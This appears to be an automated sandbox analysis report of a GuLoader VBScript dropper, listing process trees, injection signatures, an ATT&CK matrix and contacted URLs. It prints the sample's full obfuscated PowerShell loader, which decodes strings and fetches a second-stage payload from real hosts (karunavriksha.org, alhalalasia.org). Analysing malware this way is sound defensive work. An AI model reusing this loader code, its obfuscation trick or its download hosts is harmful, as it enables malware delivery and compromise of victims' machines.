andepebruu sTUnpriv.CeylonsDealmaesignifrdisembVAfmaaliafsondCHeuvelekomm.npPalladoUdskivISprednnFairl tForsulMAkkordaDe imaNMobiliALb.inggOverheeje aldRKerne.]Myster:Sikk r:SvejtsSEnfeebe ilsacPostkauErythrrD.zzieIHelmedTTwankmYInvtunpRe.ksaR NoninOSubgovt nmesmOT ldvsCEpideroS.xtanL Tphst=Endowm$ ec estTot enI AnisoLInsultB rugeriB aujoN AfhenD Ej ndEKara ts';$Splser+=Emissionskursers 'lainer5Lystba.Tr.mas0Centra Polyba(AbysmtW Smarti stivnSkur.adAfhoppoHus arwTufstesTnds i .ootdaNKldedrTMeroga Chelon1F reca0Diammi.Forbru0Kurede;Transp ProspeW BuskpiTryksanDroum.6Indfle4Bag,li;Glycer Susc.px ingm6 G ran4Sh ysi;Succul SamfunrPrespavNazifi:Se isa1Mellem3Jarbot4Inter .Idioch0 yperf) Voter In arbGAkkompeHitheoc unsankPortlioTskede/Grimac2Bidd t0collar1wor.le0Ov rbr0Macken1Murder0Eccles1Molli .parlaFbandaiiScandirSimulteUnwilffSpringo SpankxDendri/Larees1Ove,be3Auricu4Subaci.Seizu,0';$Garcon72=Emissionskursers 'CircumU eceles likkeT,enstRKabe 
l-UnconfABekranGK.sserepipefinChapout';$autogiro=Emissionskursers ' Pro,th Vir etArvef tOverstpNabobisOrdina:benefi/ Objec/ Afta.kOmegnsa Mi terSprjteu orepon PretiaFu ktivMorbi.rAftalei Enco.kMuch osHematohCaravaaEkspon. Con uo CheckrMetallgGarder/Quilk i One.em Mu tiaHelvetgReagiceApo.tasStorag/Ste nfiCorpornAftrapnBe oyao afvrgcJ dingeumlautnBourg c .esube Nonde.MarskamArts,lsRaglanopiassa>SortiehSublimt Pleurt Tinc p mpede:Levned/Bescra/D wnloaChola.lMaaleshFotostaBlotttlNephroaBagloklUnciv,a ulils AtteniOccamia Helbr.Sonateo FrimrrPla.ssgUnmora/ Denias EndrgeFlewspaFattilrOu,voicAftenshMerge /Mi iciiWalisen MashrnUnfrozoLegi ncNonth.ePrefernReauthcDet cheRntgen.ThreapmHoftehsFritimo';$Blokregistreringerne=Emissionskursers ' Aari,>';$Hjlpelsestes=Emissionskursers ' Frysei nonimeultratX';$Radiata='Gennemkre';$Bevbne='\Motorgadens.Alb';Meyers (Emissionskursers 'Kro.us$ NglevgLicansLFrilufoBo friBgio ita Dekl.lTakk l:Ult aiaBindebnRenipuA PrelaN San,bASursumSKreditenonv,srBedstenHvssesE Udp sSBortkr=Af eud$Scle,oEArgusbnForgrev Oenol: Paa.ia Homo p ntermp,uperaD Ta tfaPreflat A gJump to behavior
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "get-service;$philologer='func';get-history;$philologer+='t';get-history;$philologer+='i';$stttevvenes=get-history;$philologer+='on:';$stttevvenes=get-history;(ni -p $philologer -n emissionskursers -value { param($flavourfully);$modstillingens=6;do {$metallographically+=$flavourfully[$modstillingens];$modstillingens+=7} until(!$flavourfully[$modstillingens])$metallographically});(ni -p $philologer -n meyers -value {param($gestikulerende);.($hjlpelsestes) ($gestikulerende)});convertto-html;$unlaboring=emissionskursers 'maanednwro,gierapturtust la.embersw';$unlaboring+=emissionskursers ' ghe tehhvsysbmodstacslightlrykke is.lvove transnuvir,et';$splser=emissionskursers 'revalimrappegoheliorzho,fbeiregteulsedestloverasapred.c/';$tilbindes=emissionskursers 'frenesta arthlecuadosreg,on1 holly2';$xenon='sahari[zigge,n andepebruu stunpriv.ceylonsdealmaesignifrdisembvafmaaliafsondcheuvelekomm.nppalladoudskivisprednnfairl tforsulmakkordade imanmobilialb.inggoverheeje aldrkerne.]myster:sikk r:svejtssenfeebe ilsacpostkauerythrrd.zzieihelmedttwankmyinvtunpre.ksar noninosubgovt nmesmot ldvscepideros.xtanl tphst=endowm$ ec esttot eni anisolinsultb rugerib aujon afhend ej ndekara ts';$splser+=emissionskursers 'lainer5lystba.tr.mas0centra polyba(abysmtw smarti stivnskur.adafhoppohus arwtufstestnds i .ootdankldedrtmeroga chelon1f reca0diammi.forbru0kurede;transp prospew buskpitryksandroum.6indfle4bag,li;glycer susc.px ingm6 g ran4sh ysi;succul samfunrprespavnazifi:se isa1mellem3jarbot4inter .idioch0 yperf) voter in arbgakkompehitheoc unsankportliotskede/grimac2bidd t0collar1wor.le0ov rbr0macken1murder0eccles1molli .parlafbandaiiscandirsimulteunwilffspringo spankxdendri/larees1ove,be3auricu4subaci.seizu,0';$garcon72=emissionskursers 'circumu eceles likket,enstrkabe 
l-unconfabekrangk.sserepipefinchapout';$autogiro=emissionskursers ' pro,th vir etarvef toverstpnabobisordina:benefi/ objec/ afta.komegnsa mi tersprjteu orepon pretiafu ktivmorbi.raftalei enco.kmuch oshematohcaravaaekspon. con uo checkrmetallggarder/quilk i one.em mu tiahelvetgreagiceapo.tasstorag/ste nficorpornaftrapnbe oyao afvrgcj dingeumlautnbourg c .esube nonde.marskamarts,lsraglanopiassa>sortiehsublimt pleurt tinc p mpede:levned/bescra/d wnloachola.lmaaleshfotostablotttlnephroabagloklunciv,a ulils attenioccamia helbr.sonateo frimrrpla.ssgunmora/ denias endrgeflewspafattilrou,voicaftenshmerge /mi iciiwalisen mashrnunfrozolegi ncnonth.eprefernreauthcdet cherntgen.threapmhoftehsfritimo';$blokregistreringerne=emissionskursers ' aari,>';$hjlpelsestes=emissionskursers ' frysei nonimeultratx';$radiata='gennemkre';$bevbne='\motorgadens.alb';meyers (emissionskursers 'kro.us$ nglevglicanslfrilufobo fribgio ita dekl.ltakk l:ult aiabindebnrenipua prelan san,basursumskreditenonv,srbedstenhvssese udp ssbortkr=af eud$scle,oeargusbnforgrev oenol: paa.ia homo p ntermp,uperad ta tfapreflat a g
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "get-service;$philologer='func';get-history;$philologer+='t';get-history;$philologer+='i';$stttevvenes=get-history;$philologer+='on:';$stttevvenes=get-history;(ni -p $philologer -n emissionskursers -value { param($flavourfully);$modstillingens=6;do {$metallographically+=$flavourfully[$modstillingens];$modstillingens+=7} until(!$flavourfully[$modstillingens])$metallographically});(ni -p $philologer -n meyers -value {param($gestikulerende);.($hjlpelsestes) ($gestikulerende)});convertto-html;$unlaboring=emissionskursers 'maanednwro,gierapturtust la.embersw';$unlaboring+=emissionskursers ' ghe tehhvsysbmodstacslightlrykke is.lvove transnuvir,et';$splser=emissionskursers 'revalimrappegoheliorzho,fbeiregteulsedestloverasapred.c/';$tilbindes=emissionskursers 'frenesta arthlecuadosreg,on1 holly2';$xenon='sahari[zigge,n andepebruu stunpriv.ceylonsdealmaesignifrdisembvafmaaliafsondcheuvelekomm.nppalladoudskivisprednnfairl tforsulmakkordade imanmobilialb.inggoverheeje aldrkerne.]myster:sikk r:svejtssenfeebe ilsacpostkauerythrrd.zzieihelmedttwankmyinvtunpre.ksar noninosubgovt nmesmot ldvscepideros.xtanl tphst=endowm$ ec esttot eni anisolinsultb rugerib aujon afhend ej ndekara ts';$splser+=emissionskursers 'lainer5lystba.tr.mas0centra polyba(abysmtw smarti stivnskur.adafhoppohus arwtufstestnds i .ootdankldedrtmeroga chelon1f reca0diammi.forbru0kurede;transp prospew buskpitryksandroum.6indfle4bag,li;glycer susc.px ingm6 g ran4sh ysi;succul samfunrprespavnazifi:se isa1mellem3jarbot4inter .idioch0 yperf) voter in arbgakkompehitheoc unsankportliotskede/grimac2bidd t0collar1wor.le0ov rbr0macken1murder0eccles1molli .parlafbandaiiscandirsimulteunwilffspringo spankxdendri/larees1ove,be3auricu4subaci.seizu,0';$garcon72=emissionskursers 'circumu eceles likket,enstrkabe l-unconfabekrangk.sserepipefinchapout';$autogiro=emissionskursers 
' pro,th vir etarvef toverstpnabobisordina:benefi/ objec/ afta.komegnsa mi tersprjteu orepon pretiafu ktivmorbi.raftalei enco.kmuch oshematohcaravaaekspon. con uo checkrmetallggarder/quilk i one.em mu tiahelvetgreagiceapo.tasstorag/ste nficorpornaftrapnbe oyao afvrgcj dingeumlautnbourg c .esube nonde.marskamarts,lsraglanopiassa>sortiehsublimt pleurt tinc p mpede:levned/bescra/d wnloachola.lmaaleshfotostablotttlnephroabagloklunciv,a ulils attenioccamia helbr.sonateo frimrrpla.ssgunmora/ denias endrgeflewspafattilrou,voicaftenshmerge /mi iciiwalisen mashrnunfrozolegi ncnonth.eprefernreauthcdet cherntgen.threapmhoftehsfritimo';$blokregistreringerne=emissionskursers ' aari,>';$hjlpelsestes=emissionskursers ' frysei nonimeultratx';$radiata='gennemkre';$bevbne='\motorgadens.alb';meyers (emissionskursers 'kro.us$ nglevglicanslfrilufobo fribgio ita dekl.ltakk l:ult aiabindebnrenipua prelan san,basursumskreditenonv,srbedstenhvssese udp ssbortkr=af eud$scle,oeargusbnforgrev oenol: paa.ia homo p ntermp,uperad ta tfapreflat a g
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "get-service;$philologer='func';get-history;$philologer+='t';get-history;$philologer+='i';$stttevvenes=get-history;$philologer+='on:';$stttevvenes=get-history;(ni -p $philologer -n emissionskursers -value { param($flavourfully);$modstillingens=6;do {$metallographically+=$flavourfully[$modstillingens];$modstillingens+=7} until(!$flavourfully[$modstillingens])$metallographically});(ni -p $philologer -n meyers -value {param($gestikulerende);.($hjlpelsestes) ($gestikulerende)});convertto-html;$unlaboring=emissionskursers 'maanednwro,gierapturtust la.embersw';$unlaboring+=emissionskursers ' ghe tehhvsysbmodstacslightlrykke is.lvove transnuvir,et';$splser=emissionskursers 'revalimrappegoheliorzho,fbeiregteulsedestloverasapred.c/';$tilbindes=emissionskursers 'frenesta arthlecuadosreg,on1 holly2';$xenon='sahari[zigge,n andepebruu stunpriv.ceylonsdealmaesignifrdisembvafmaaliafsondcheuvelekomm.nppalladoudskivisprednnfairl tforsulmakkordade imanmobilialb.inggoverheeje aldrkerne.]myster:sikk r:svejtssenfeebe ilsacpostkauerythrrd.zzieihelmedttwankmyinvtunpre.ksar noninosubgovt nmesmot ldvscepideros.xtanl tphst=endowm$ ec esttot eni anisolinsultb rugerib aujon afhend ej ndekara ts';$splser+=emissionskursers 'lainer5lystba.tr.mas0centra polyba(abysmtw smarti stivnskur.adafhoppohus arwtufstestnds i .ootdankldedrtmeroga chelon1f reca0diammi.forbru0kurede;transp prospew buskpitryksandroum.6indfle4bag,li;glycer susc.px ingm6 g ran4sh ysi;succul samfunrprespavnazifi:se isa1mellem3jarbot4inter .idioch0 yperf) voter in arbgakkompehitheoc unsankportliotskede/grimac2bidd t0collar1wor.le0ov rbr0macken1murder0eccles1molli .parlafbandaiiscandirsimulteunwilffspringo spankxdendri/larees1ove,be3auricu4subaci.seizu,0';$garcon72=emissionskursers 'circumu eceles likket,enstrkabe 
l-unconfabekrangk.sserepipefinchapout';$autogiro=emissionskursers ' pro,th vir etarvef toverstpnabobisordina:benefi/ objec/ afta.komegnsa mi tersprjteu orepon pretiafu ktivmorbi.raftalei enco.kmuch oshematohcaravaaekspon. con uo checkrmetallggarder/quilk i one.em mu tiahelvetgreagiceapo.tasstorag/ste nficorpornaftrapnbe oyao afvrgcj dingeumlautnbourg c .esube nonde.marskamarts,lsraglanopiassa>sortiehsublimt pleurt tinc p mpede:levned/bescra/d wnloachola.lmaaleshfotostablotttlnephroabagloklunciv,a ulils attenioccamia helbr.sonateo frimrrpla.ssgunmora/ denias endrgeflewspafattilrou,voicaftenshmerge /mi iciiwalisen mashrnunfrozolegi ncnonth.eprefernreauthcdet cherntgen.threapmhoftehsfritimo';$blokregistreringerne=emissionskursers ' aari,>';$hjlpelsestes=emissionskursers ' frysei nonimeultratx';$radiata='gennemkre';$bevbne='\motorgadens.alb';meyers (emissionskursers 'kro.us$ nglevglicanslfrilufobo fribgio ita dekl.ltakk l:ult aiabindebnrenipua prelan san,basursumskreditenonv,srbedstenhvssese udp ssbortkr=af eud$scle,oeargusbnforgrev oenol: paa.ia homo p ntermp,uperad ta tfapreflat a g
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 311 Process Injection | 11 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 23 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      Behavior Graph ID: 1658919  Sample: Blikvarefabrikken.vbs  Startdate: 08/04/2025  Architecture: WINDOWS  Score: 100
      Sample-level DNS/IP: karunavriksha.org
      Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected GuLoader; 2 other signatures
      Processes started from the sample: wscript.exe 1; powershell.exe 16; svchost.exe 1 1
      wscript.exe 1
        Signatures: VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
        Started: cmd.exe 1; powershell.exe 14 16
      powershell.exe 16 (started from the sample)
        Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
        Started: conhost.exe; msiexec.exe
      cmd.exe 1 (started by wscript.exe)
        Signatures: Uses ping.exe to check the status of other devices and networks
        Started: PING.EXE 1; conhost.exe
      powershell.exe 14 16 (started by wscript.exe)
        DNS/IP: karunavriksha.org 146.88.26.238, 443, 49683 NETMAGIC-APNetmagicDatacenterMumbaiIN India
        Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
        Started: conhost.exe
      PING.EXE 1 (started by cmd.exe)
        DNS/IP: 127.0.0.1 unknown unknown

      Source | Detection | Scanner | Label | Link
      Blikvarefabrikken.vbs | 8% | Virustotal | | Browse
      Blikvarefabrikken.vbs | 6% | ReversingLabs | Script-WScript.Trojan.GuLoader |
      SAMPLE | 100% | Joe Sandbox ML | |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      https://karunavriksha.org/ima | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/innocence. | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/innocence.mso | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/image | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/innocen | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/inn | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/innocence | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/in | 0% | Avira URL Cloud | safe |
      http://alhalalasia.or | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/innocence.m | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/imag | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/ | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/innocenc | 0% | Avira URL Cloud | safe |
      https://karunavriksha.or | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/innoce | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/innocence.mso | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/searc | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/inno | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/sear | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/se | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/im | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/ | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/innoc | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/innocence.msolb | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/in | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/innocen | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/inno | 0% | Avira URL Cloud | safe |
      http://karunavriksha.org | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/innocence.m | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/innocence.msoP | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/innocence.ms | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/innocence | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/i | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/innocenc | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/i | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/i | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/innocence. | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/innocence.ms | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/ | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/ | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/sea | 0% | Avira URL Cloud | safe |
      https://karunavriksha.o | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/innoce | 0% | Avira URL Cloud | safe |
      http://alhalalasia.o | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/search/innoc | 0% | Avira URL Cloud | safe |
      http://alhalalasia.org/s | 0% | Avira URL Cloud | safe |
      https://karunavriksha.org/images/inn | 0% | Avira URL Cloud | safe |


      NameIPActiveMaliciousAntivirus DetectionReputation
      karunavriksha.org
      146.88.26.238
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://karunavriksha.org/images/innocence.msofalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://alhalalasia.orpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://karunavriksha.org/images/inpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://alhalalasia.org/search/innpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://alhalalasia.org/search/innocence.powershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://karunavriksha.org/imagepowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://alhalalasia.org/search/innocenpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://karunavriksha.org/imapowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/Licensepowershell.exe, 00000007.00000002.2098645620.0000000005208000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://alhalalasia.org/searchpowershell.exe, 00000004.00000002.1117306076.000001AF80CAC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
